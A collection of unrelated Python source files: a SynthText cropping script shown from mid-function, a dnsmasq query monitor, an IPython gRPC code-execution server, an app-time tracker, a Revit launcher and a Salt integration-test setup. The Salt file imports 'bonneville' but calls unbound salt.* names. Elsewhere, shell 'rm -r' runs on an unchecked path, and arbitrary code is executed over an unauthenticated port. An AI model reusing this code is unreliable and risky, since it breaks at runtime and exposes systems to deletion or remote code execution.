max_w, max_h = np.amax(bb, axis=0)
#margin = margin_ratio * np.sqrt((max_w - min_w) * (max_h - min_h))
margin = 0
min_w = int(round(max(min_w - margin * (np.random.rand() + 0.5), 0)))
min_h = int(round(max(min_h - margin * (np.random.rand() + 0.5), 0)))
max_w = int(round(min(max_w + margin * (np.random.rand() + 0.5), img_width - 1)))
max_h = int(round(min(max_h + margin * (np.random.rand() + 0.5), img_height - 1)))
char_bb = char_bbs[char_bb_index:char_bb_index + len(word)] #N, 4, 2
char_bb_index += len(word)
char_bb[:, :, ::2] = char_bb[:, :, ::2] - min_w
char_bb[:, :, 1::2] = char_bb[:, :, 1::2] - min_h
if not np.all(char_bb >= 0):
continue
img_cropped = img[min_h:max_h, min_w:max_w].copy()
try:
img_data = cv2.imencode('.jpg', img_cropped)[1].tostring()
except:
continue
char_box = char_bb.T
words = ''.join(word)
aspect_ratio = (max_w - min_w) / (max_h - min_h)
if(sample_filter(char_box.tolist(), words, aspect_ratio)):
image_writer.put(img_data, filename='', extra=dict(char_box=char_box.tolist(), words=words, aspect_ratio=aspect_ratio))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str,
default='/unsullied/sharefs/_csg_algorithm/Interns/guanyushuo/OCR/SynthText/Synthtext/SynthTextData/results_bin',
help='Target tar file to impact into nori file')
parser.add_argument('--dest_path', type=str,
default='/unsullied/sharefs/_csg_algorithm/Interns/yangmingkun/datasets/scenetext/noris/synthtext',
help='Destination file path to store the generated nori file')
parser.add_argument('--jobs', type=int)
parser.add_argument('--margin', type=float, default=0.1)
parser.add_argument('--max_num', type=int)
args = parser.parse_args()
data_dir = args.data_dir
dest_path = args.dest_path
if os.path.exists(dest_path):
os.system('rm -r {0}'.format(dest_path))
file_list = get_file_list(data_dir)
file_list_length = len(file_list)
step = int(math.ceil(file_list_length / args.jobs))
processes = []
for i in range(args.jobs):
begin = i * step
end = min((i + 1) * step, file_list_length)
if args.max_num is None:
p = Process(target=run_child, args=(dest_path, file_list[begin:end], i, args.margin, end - begin))
else:
p = Process(target=run_child, args=(dest_path, file_list[begin:end], i, args.margin, args.max_num))
p.daemon = True
p.start()
processes.append(p)
for p in processes:
p.join()
if __name__ == '__main__':
main()
|
monitor_domains.py
|
from collections import defaultdict
ip2queryShort=defaultdict(lambda: {})
ip2query=defaultdict(lambda: {})
def getIPQueryMappingShort():
return ip2queryShort
def getIPQueryMapping():
return ip2query
def sortDomainsByLastResolved(domains,reverse=False):
now=time.time()
domains.sort(reverse=reverse, key=lambda d: (lastDomainResolveTime(d) or now+2,lastDomainResolveTime(d,True) or now+1,d))
resolveShortTimeList={}
resolveTimeList={}
def wasResolved(domain,short=False):
"was domain or its short form resolved this session"
l = resolveTimeList
if short:
domain=ip2dns.shorten(domain)
l = resolveShortTimeList
resolved = l.get(domain,False)
return True if resolved else False
def wasResolvedBy(domain,ip=False,short=False):
raise NotImplementedError("todo")
def filterOnlyResolvedDomains(domains,short=False):
"return the domains that were actually resolved during this session (short=compare using short form)"
ret=[]
for d in domains:
if wasResolved(d,short):
ret.append(d)
if ret!=[]:
return ret
return False
# For prioritizing shown domains
def lastDomainResolveTime(domain,short=False):
l = resolveTimeList
if short:
domain=ip2dns.shorten(domain)
l=resolveShortTimeList
return l.get(domain)
import time
import dnsmasq_parser
import ip2dns
import ipaddress
import config
def onJournalMessage(entry):
l=entry["MESSAGE"]
ts=entry['__REALTIME_TIMESTAMP'] #we are parsing real time, no use
q = dnsmasq_parser.parse_query(l)
if q:
source = ipaddress.ip_address(q["source"])
domain=q["query"]
if domain in config.ignored_domains:
return
sdomain=ip2dns.shorten(domain)
now=time.time()
ip2query[source][domain]=now
ip2queryShort[source][sdomain]=now
resolveTimeList[domain]=now
resolveShortTimeList[sdomain]=now
#print(q)
else:
ip2dns.onJournalMessage(entry)
import select
from systemd import journal
def monitor():
reader = journal.Reader()
reader.log_level(journal.LOG_INFO)
reader.add_match(_SYSTEMD_UNIT="dnsmasq.service")
reader.seek_tail()
reader.get_previous()
poller = select.poll()
poller.register(reader, reader.get_events())
try:
while poller.poll():
if reader.process() != journal.APPEND:
continue
for entry in reader:
if entry['MESSAGE']:
onJournalMessage(entry)
except KeyboardInterrupt as e:
return
import threading
def start_monitoring():
monitor_thread = threading.Thread(name='monitorthread', target=monitor, daemon=True)
monitor_thread.start()
if __name__ == '__main__':
monitor()
|
ipython_server.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import jupyter_client
import os
import sys
import threading
import time
from concurrent import futures
import grpc
import ipython_pb2
import ipython_pb2_grpc
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
class IPython(ipython_pb2_grpc.IPythonServicer):
def __init__(self, server):
self._status = ipython_pb2.STARTING
self._server = server
# issue with execute_interactive and auto completion: https://github.com/jupyter/jupyter_client/issues/429
# in all case because ipython does not support run and auto completion at the same time: https://github.com/jupyter/notebook/issues/3763
# For now we will lock to ensure that there is no concurrent bug that can "hang" the kernel
self._lock = threading.Lock()
def start(self):
print("starting...")
sys.stdout.flush()
self._km, self._kc = jupyter_client.manager.start_new_kernel(kernel_name='python')
self._status = ipython_pb2.RUNNING
def execute(self, request, context):
print("execute code:\n")
print(request.code.encode('utf-8'))
sys.stdout.flush()
stream_reply_queue = queue.Queue(maxsize = 30)
payload_reply = []
def _output_hook(msg):
msg_type = msg['header']['msg_type']
content = msg['content']
print("******************* CONTENT ******************")
outStatus, outType, output = ipython_pb2.SUCCESS, None, None
# prepare the reply
if msg_type == 'stream':
outType = ipython_pb2.TEXT
output = content['text']
elif msg_type in ('display_data', 'execute_result'):
print(content['data'])
# The if-else order matters, can not be changed. Because ipython may provide multiple output.
# TEXT is the last resort type.
if 'text/html' in content['data']:
outType = ipython_pb2.HTML
output = content['data']['text/html']
elif 'image/jpeg' in content['data']:
outType = ipython_pb2.JPEG
output = content['data']['image/jpeg']
elif 'image/png' in content['data']:
outType = ipython_pb2.PNG
output = content['data']['image/png']
elif 'application/javascript' in content['data']:
outType = ipython_pb2.HTML
output = '<script> ' + content['data']['application/javascript'] + ' </script>\n'
elif 'application/vnd.holoviews_load.v0+json' in content['data']:
outType = ipython_pb2.HTML
output = '<script> ' + content['data']['application/vnd.holoviews_load.v0+json'] + ' </script>\n'
elif 'text/plain' in content['data']:
outType = ipython_pb2.TEXT
output = content['data']['text/plain']
elif msg_type == 'error':
outStatus = ipython_pb2.ERROR
outType = ipython_pb2.TEXT
output = '\n'.join(content['traceback'])
# send reply if we supported the output type
if outType is not None:
stream_reply_queue.put(
ipython_pb2.ExecuteResponse(status=outStatus,
type=outType,
output=output))
def execute_worker():
reply = self._kc.execute_interactive(request.code,
output_hook=_output_hook,
timeout=None)
payload_reply.append(reply)
t = threading.Thread(name="ConsumerThread", target=execute_worker)
with self._lock:
t.start()
# We want to wait the end of the execution (and queue empty).
# In our case when the thread is not alive -> it means that the execution is complete
# However we also ensure that the kernel is alive because in case of OOM or other errors
# Execution might be stuck there: (might open issue on jupyter client)
# https://github.com/jupyter/jupyter_client/blob/master/jupyter_client/blocking/client.py#L323
while (t.is_alive() and self.isKernelAlive()) or not stream_reply_queue.empty():
# Sleeping time to time to reduce cpu usage.
# At worst it will bring a 0.05 delay for bunch of messages.
# Overall it will improve performance.
time.sleep(0.05)
while not stream_reply_queue.empty():
yield stream_reply_queue.get()
# if kernel is not alive or thread is still alive, it means that we face an issue.
if not self.isKernelAlive() or t.is_alive():
yield ipython_pb2.ExecuteResponse(status=ipython_pb2.ERROR,
type=ipython_pb2.TEXT,
output="Ipython kernel has been stopped. Please check logs. It might be because of an out of memory issue.")
if payload_reply:
result = []
for payload in payload_reply[0]['content']['payload']:
if payload['data']['text/plain']:
result.append(payload['data']['text/plain'])
if result:
yield ipython_pb2.ExecuteResponse(status=ipython_pb2.SUCCESS,
type=ipython_pb2.TEXT,
output='\n'.join(result))
def cancel(self, request, context):
self._km.interrupt_kernel()
return ipython_pb2.CancelResponse()
def complete(self, request, context):
with self._lock:
reply = self._kc.complete(request.code, request.cursor, reply=True, timeout=None)
return ipython_pb2.CompletionResponse(matches=reply['content']['matches'])
def status(self, request, context):
return ipython_pb2.StatusResponse(status = self._status)
def isKernelAlive(self):
return self._km.is_alive()
def terminate(self):
self._km.shutdown_kernel()
def stop(self, request, context):
self.terminate()
return ipython_pb2.StopResponse()
def serve(port):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
ipython = IPython(server)
ipython_pb2_grpc.add_IPythonServicer_to_server(ipython, server)
server.add_insecure_port('[::]:' + port)
server.start()
ipython.start()
try:
while ipython.isKernelAlive():
time.sleep(5)
except KeyboardInterrupt:
print("interrupted")
finally:
print("shutdown")
# we let 2 sc for all request to be complete
server.stop(2)
ipython.terminate()
os._exit(0)
if __name__ == '__main__':
serve(sys.argv[1])
|
manager.py
|
from recorder import recorder
from threading import Thread
from trackable import trackable
from fileIO import fileInputOutput
import os
import time
class manager:
__isRecording = False
__toBeTracked = []
__myReader = None
__myRecorder = None
# might put it in a primer
def __init__(self,processFilePath,trackFilePath):
self.__myReader = fileInputOutput(processFilePath,trackFilePath)
self.__myRecorder = recorder(self.__myReader)
self.__createTrackableObjects()
#** creates trackable objects from the track data file entries, as long as they are currently set to be tracked!
def __createTrackableObject(self,line):
line = line.split("|")
if(line[0] is 'Y'):
temp = trackable(line[1],float(line[2]))
self.__toBeTracked.append(temp)
def __createTrackableObjects(self):
allAppsInFile = self.__myReader.getAllTrackedLines()
for line in allAppsInFile:
self.__createTrackableObject(line)
# ** Add a new application you want to track to the list of trackables and also into the track file (used as a database). By Default every newly added app is tracked.
def addNewTrackable(self,newApp):
if (len(newApp)is 0):
return
toBeAdded = "Y|"+ newApp +"|0"
self.__myReader.addNewOnTracked(toBeAdded)
self.__myReader.newReset(newApp)
temp = trackable(newApp,float("0"))
self.__toBeTracked.append(temp)
# ** Make a specific application trackable
def setTrackable(self,appName):
if(self.__myRecorder.isOn() is True):
return
allAppsInFile = self.__myReader.getAllTrackedLines()
for i,line in enumerate(allAppsInFile) :
temp = line.split("|")
if (temp[1] == appName):
line = 'Y|'+appName+"|"+temp[2]
allAppsInFile[i] = line
self.__myReader.overWriteTrackedLines(allAppsInFile)
self.__toBeTracked.clear()
self.__createTrackableObjects()
# ** Make a specific application untrackable (Change is made in the database)
def setUntrackable(self,appName):
if(self.__myRecorder.isOn() is True):
return
allAppsInFile = self.__myReader.getAllTrackedLines()
for i,line in enumerate(allAppsInFile):
temp = line.split("|")
if (temp[1] == appName):
line = 'N|'+appName+"|"+temp[2]
allAppsInFile[i] = line
self.__myReader.overWriteTrackedLines(allAppsInFile)
self.__toBeTracked.clear()
self.__createTrackableObjects()
#** initiate the call to the recorder by putting it to the thread
def startrecording(self):
print("I am recording...")
if(self.__myRecorder.isOn() is False):
for app in self.__toBeTracked:
app.setForTrack()
t = Thread(target = self.__myRecorder.turnOnRecording, name="thread1",args=(self.__toBeTracked,))
t.start()
#** Stop the recording
def stoprecording(self):
print("I stopped...")
if(self.__myRecorder.isOn() is True):
for app in self.__toBeTracked:
self.__myReader.getProcesses()
isRunning = self.__myReader.isAppRunning(app.getName())
if (isRunning is True and app.getIsTracked() is True):
app.setForUpdate()
self.__myRecorder.turnOffRecording()
time.sleep(0.01)
self.__updateTimeOnData()
# This method reorganizes the app data and calls the reader/writer to overwrite the trackData file to reflect changes.
def __updateTimeOnData(self):
allAppsInFile = self.__myReader.getAllTrackedLines()
for i, line in enumerate(allAppsInFile):
temp = line.split("|")
trackedIndex = self.__isAppInSession(temp[1])
if(trackedIndex > -1):
getThis = self.__toBeTracked[trackedIndex].getTotalSecond()
allAppsInFile[i] = 'Y|'+temp[1]+'|' + str(self.__toBeTracked[trackedIndex].getTotalSecond())
if(i+1 != len(allAppsInFile)):
allAppsInFile[i] = allAppsInFile[i]+'\n'
self.__myReader.overWriteTrackedLines(allAppsInFile)
def __isAppInSession(self, appName):
for i, app in enumerate (self.__toBeTracked):
if (appName == app.getName()):
return i
return -1
def resetData(self,appName):
if(self.__myRecorder.isOn() is True):
return
allAppsInFile = self.__myReader.getAllTrackedLines()
for i, line in enumerate(allAppsInFile):
temp = line.split("|")
if (temp[1]==appName):
line = temp[0]+'|'+temp[1]+'|'+'0.0'
if (i != (len(allAppsInFile)-1)):
line = line + '\n'
allAppsInFile[i] = line
self.__myReader.overWriteTrackedLines(allAppsInFile)
self.__createTrackableObjects()
for app in self.__toBeTracked:
if(app.getName() == appName):
app.resetTotalSecond()
def printAll(self):
for x in self.__toBeTracked:
print(x.getName())
def getTrackedObjects(self):
return self.__toBeTracked
|
ConnectionHostVerification.py
|
#Created by Damian Krzemiński, contact: krzemodam2@gmail.com
_debug_ = False
import sys
sys.path.append(_app_path_ + "\\PythonScripts")
sys.path.append(_app_path_ + "\\PythonScripts\\Lib")
from MainForm import MainForm
import threading
import time
import rvt
import clr
clr.AddReference("System.Collections")
import System.Collections.Generic
from System.Collections.Generic import List, Dictionary
from Autodesk.Revit.DB import *
from Autodesk.Revit.DB.Structure import *
from Autodesk.Revit.UI import *
import Autodesk.Revit.Creation
from Autodesk.Revit.Creation import *
uiapp = _command_data_.Application
app = uiapp.Application
uidoc = uiapp.ActiveUIDocument
doc = uidoc.Document
cdoc = doc.Create
rvt._event_path_.Location = "{}\\PythonScripts\\Connections\\ConnectionHostVerification_sub.py".format(_app_path_)
class Program(MainForm):
#set "console" class parameter to 1 for debug dialog, set 2 fore modeless dialog
console = 2
def Start(self):
#self.log([opt for opt in rvt._event_path_])
rvt._event_.Raise()
#exEvent.Dispose()
f = Program()
def start_form():
f.ShowDialog()
thread_operation = threading.Thread(target = start_form)
thread_operation.daemon = True
thread_operation.start()
|
__init__.py
|
'''
Set up the Salt integration test suite
'''
# Import Python libs
import re
import os
import sys
import time
import shutil
import pprint
import logging
import tempfile
import subprocess
import multiprocessing
from hashlib import md5
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
INTEGRATION_TEST_DIR = os.path.dirname(
os.path.normpath(os.path.abspath(__file__))
)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
SALT_LIBS = os.path.dirname(CODE_DIR)
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.case import ShellTestCase
from salttesting.mixins import CheckShellBinaryNameAndVersionMixIn
from salttesting.parser import PNUM, print_header, SaltTestcaseParser
from salttesting.helpers import ensure_in_syspath, RedirectStdStreams
# Update sys.path
ensure_in_syspath(CODE_DIR, SALT_LIBS)
# Import Salt libs
import bonneville
import bonneville.config
import bonneville.master
import bonneville.minion
import bonneville.runner
import bonneville.output
import bonneville.version
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
# Import 3rd-party libs
import yaml
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
SYS_TMP_DIR = os.environ.get('TMPDIR', tempfile.gettempdir())
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
PYEXEC = 'python{0}.{1}'.format(sys.version_info[0], sys.version_info[1])
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
TMP_CONF_DIR = os.path.join(TMP, 'config')
log = logging.getLogger(__name__)
def run_tests(TestCase, needs_daemon=True):
'''
Run integration tests for a chosen test case.
Function uses optparse to set up test environment
'''
class TestcaseParser(SaltTestcaseParser):
def setup_additional_options(self):
self.add_option(
'--sysinfo',
default=False,
action='store_true',
help='Print some system information.'
)
self.output_options_group.add_option(
'--no-colors',
'--no-colours',
default=False,
action='store_true',
help='Disable colour printing.'
)
def run_testcase(self, testcase, needs_daemon=True):
if needs_daemon:
print('Setting up Salt daemons to execute tests')
with TestDaemon(self):
return SaltTestcaseParser.run_testcase(self, testcase)
return SaltTestcaseParser.run_testcase(self, testcase)
parser = TestcaseParser()
parser.parse_args()
if parser.run_testcase(TestCase, needs_daemon=needs_daemon) is False:
parser.finalize(1)
parser.finalize(0)
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, parser):
self.parser = parser
self.colors = get_colors(self.parser.options.no_colors is False)
def __enter__(self):
'''
Start a master and minion
'''
running_tests_user = pwd.getpwuid(os.getuid()).pw_name
self.master_opts = salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
self.master_opts['user'] = running_tests_user
minion_config_path = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', 'minion'
)
self.minion_opts = salt.config.minion_config(minion_config_path)
self.minion_opts['user'] = running_tests_user
self.syndic_opts = salt.config.syndic_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic'),
minion_config_path
)
self.syndic_opts['user'] = running_tests_user
#if sys.version_info < (2, 7):
# self.minion_opts['multiprocessing'] = False
self.sub_minion_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
)
self.sub_minion_opts['root_dir'] = os.path.join(TMP, 'subsalt')
self.sub_minion_opts['user'] = running_tests_user
#if sys.version_info < (2, 7):
# self.sub_minion_opts['multiprocessing'] = False
self.smaster_opts = salt.config.master_config(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic_master'
)
)
self.smaster_opts['user'] = running_tests_user
# Set up config options that require internal data
self.master_opts['pillar_roots'] = {
'base': [os.path.join(FILES, 'pillar', 'base')]
}
self.master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
TMP_STATE_TREE
]
}
self.master_opts['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(
os.path.join(
FILES,
'ext.yaml'
)
)}
)
self.master_opts['extension_modules'] = os.path.join(INTEGRATION_TEST_DIR, 'files', 'extension_modules')
# clean up the old files
self._clean()
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
self.master_opts[optname] = optname_path
self.minion_opts[optname] = optname_path
self.sub_minion_opts[optname] = optname_path
verify_env([os.path.join(self.master_opts['pki_dir'], 'minions'),
os.path.join(self.master_opts['pki_dir'], 'minions_pre'),
os.path.join(self.master_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.master_opts['cachedir'], 'jobs'),
os.path.join(self.smaster_opts['pki_dir'], 'minions'),
os.path.join(self.smaster_opts['pki_dir'], 'minions_pre'),
os.path.join(self.smaster_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.smaster_opts['cachedir'], 'jobs'),
os.path.dirname(self.master_opts['log_file']),
self.minion_opts['extension_modules'],
self.sub_minion_opts['extension_modules'],
self.sub_minion_opts['pki_dir'],
self.master_opts['sock_dir'],
self.smaster_opts['sock_dir'],
self.sub_minion_opts['sock_dir'],
self.minion_opts['sock_dir'],
TMP_STATE_TREE,
TMP
],
running_tests_user)
# Set up PATH to mockbin
self._enter_mockbin()
master = salt.master.Master(self.master_opts)
self.master_process = multiprocessing.Process(target=master.start)
self.master_process.start()
minion = salt.minion.Minion(self.minion_opts)
self.minion_process = multiprocessing.Process(target=minion.tune_in)
self.minion_process.start()
sub_minion = salt.minion.Minion(self.sub_minion_opts)
self.sub_minion_process = multiprocessing.Process(
target=sub_minion.tune_in
)
self.sub_minion_process.start()
smaster = salt.master.Master(self.smaster_opts)
self.smaster_process = multiprocessing.Process(target=smaster.start)
self.smaster_process.start()
syndic = salt.minion.Syndic(self.syndic_opts)
self.syndic_process = multiprocessing.Process(target=syndic.tune_in)
self.syndic_process.start()
if os.environ.get('DUMP_SALT_CONFIG', None) is not None:
from copy import deepcopy
try:
os.makedirs('/tmp/salttest/conf')
except OSError:
pass
master_opts = deepcopy(self.master_opts)
minion_opts = deepcopy(self.minion_opts)
master_opts.pop('conf_file', None)
minion_opts.pop('conf_file', None)
minion_opts.pop('grains', None)
minion_opts.pop('pillar', None)
open('/tmp/salttest/conf/master', 'w').write(
yaml.dump(master_opts)
)
open('/tmp/salttest/conf/minion', 'w').write(
yaml.dump(minion_opts)
)
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if self.parser.options.sysinfo:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because it's creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
'''
return salt.client.LocalClient(
mopts=self.master_opts
)
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
import integration
integration.SYNDIC = None
self.sub_minion_process.terminate()
self.sub_minion_process.join()
self.minion_process.terminate()
self.minion_process.join()
self.master_process.terminate()
self.master_process.join()
self.syndic_process.terminate()
self.syndic_process.join()
self.smaster_process.terminate()
self.smaster_process.join()
self._exit_mockbin()
self._clean()
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
# Wait for minions to connect back
wait_minion_connections = multiprocessing.Process(
target=self.wait_for_minion_connections,
args=(self.minion_targets, self.MINIONS_CONNECT_TIMEOUT)
)
wait_minion_connections.start()
wait_minion_connections.join()
wait_minion_connections.terminate()
if wait_minion_connections.exitcode > 0:
print(
'\n {RED_BOLD}*{ENDC} ERROR: Minions failed to connect'.format(
**self.colors
)
)
return False
del wait_minion_connections
sync_needed = self.parser.options.clean
if self.parser.options.clean is False:
def sumfile(fpath):
# Since we will be do'in this for small files, it should be ok
fobj = fopen(fpath)
m = md5()
while True:
d = fobj.read(8096)
if not d:
break
m.update(d)
return m.hexdigest()
# Since we're not cleaning up, let's see if modules are already up
# to date so we don't need to re-sync them
modules_dir = os.path.join(FILES, 'file', 'base', '_modules')
for fname in os.listdir(modules_dir):
if not fname.endswith('.py'):
continue
dfile = os.path.join(
'/tmp/salttest/cachedir/extmods/modules/', fname
)
if not os.path.exists(dfile):
sync_needed = True
break
sfile = os.path.join(modules_dir, fname)
if sumfile(sfile) != sumfile(dfile):
sync_needed = True
break
if sync_needed:
# Wait for minions to "sync_all"
sync_minions = multiprocessing.Process(
target=self.sync_minion_modules,
args=(self.minion_targets, self.MINIONS_SYNC_TIMEOUT)
)
sync_minions.start()
sync_minions.join()
if sync_minions.exitcode > 0:
return False
sync_minions.terminate()
del sync_minions
return True
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
def _clean(self):
'''
Clean out the tmp files
'''
if not self.parser.options.clean:
return
if os.path.isdir(self.sub_minion_opts['root_dir']):
shutil.rmtree(self.sub_minion_opts['root_dir'])
if os.path.isdir(self.master_opts['root_dir']):
shutil.rmtree(self.master_opts['root_dir'])
if os.path.isdir(self.smaster_opts['root_dir']):
shutil.rmtree(self.smaster_opts['root_dir'])
if os.path.isdir(TMP):
shutil.rmtree(TMP)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else:
sys.stdout.write(
'\n {RED_BOLD}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', expr_form='list'
)
return [
k for (k, v) in running.items() if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
responses = self.client.cmd(
list(expected_connections), 'test.ping', expr_form='list',
)
for target in responses:
if target not in expected_connections:
# Someone(minion) else "listening"?
continue
expected_connections.remove(target)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else:
print(
'\n {RED_BOLD}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules(self, targets, timeout=120):
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s modules '
'(saltutil.sync_modules)'.format(
', '.join(targets),
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_modules',
expr_form='list',
timeout=9999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {RED_BOLD}*{ENDC} WARNING: Minions failed to sync modules. '
'Tests requiring these modules WILL fail'.format(**self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in rdata.items():
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} modules: '
'{1}'.format(
name, ', '.join(output['ret']), **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {RED_BOLD}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
class AdaptedConfigurationTestCaseMixIn(object):
__slots__ = ()
def get_config_dir(self):
integration_config_dir = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf'
)
if os.getuid() == 0:
# Running as root, the running user does not need to be updated
return integration_config_dir
for fname in os.listdir(integration_config_dir):
self.get_config_file_path(fname)
return TMP_CONF_DIR
def get_config_file_path(self, filename):
integration_config_file = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', filename
)
if os.getuid() == 0:
# Running as root, the running user does not need to be updated
return integration_config_file
if not os.path.isdir(TMP_CONF_DIR):
os.makedirs(TMP_CONF_DIR)
updated_config_path = os.path.join(TMP_CONF_DIR, filename)
if not os.path.isfile(updated_config_path):
self.__update_config(integration_config_file, updated_config_path)
return updated_config_path
def __update_config(self, source, dest):
if not os.path.isfile(dest):
running_tests_user = pwd.getpwuid(os.getuid()).pw_name
configuration = yaml.load(open(source).read())
configuration['user'] = running_tests_user
open(dest, 'w').write(yaml.dump(configuration))
class SaltClientTestCaseMixIn(AdaptedConfigurationTestCaseMixIn):
_salt_client_config_file_name_ = 'master'
__slots__ = ('client', '_salt_client_config_file_name_')
@property
def client(self):
return salt.client.LocalClient(
self.get_config_file_path(self._salt_client_config_file_name_)
)
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a module function
'''
def minion_run(self, _function, *args, **kw):
'''
Run a single salt function on the 'minion' target and condition
the return down to match the behavior of the raw function call
'''
return self.run_function(_function, args, **kw)
def run_function(self, function, arg=(), minion_tgt='minion', timeout=25,
**kwargs):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
know_to_return_none = (
'file.chown', 'file.chgrp', 'ssh.recv_known_host'
)
orig = self.client.cmd(
minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
)
if minion_tgt not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion \'{0}\'. Command output: {1}'.format(
minion_tgt, orig
)
)
elif orig[minion_tgt] is None and function not in know_to_return_none:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
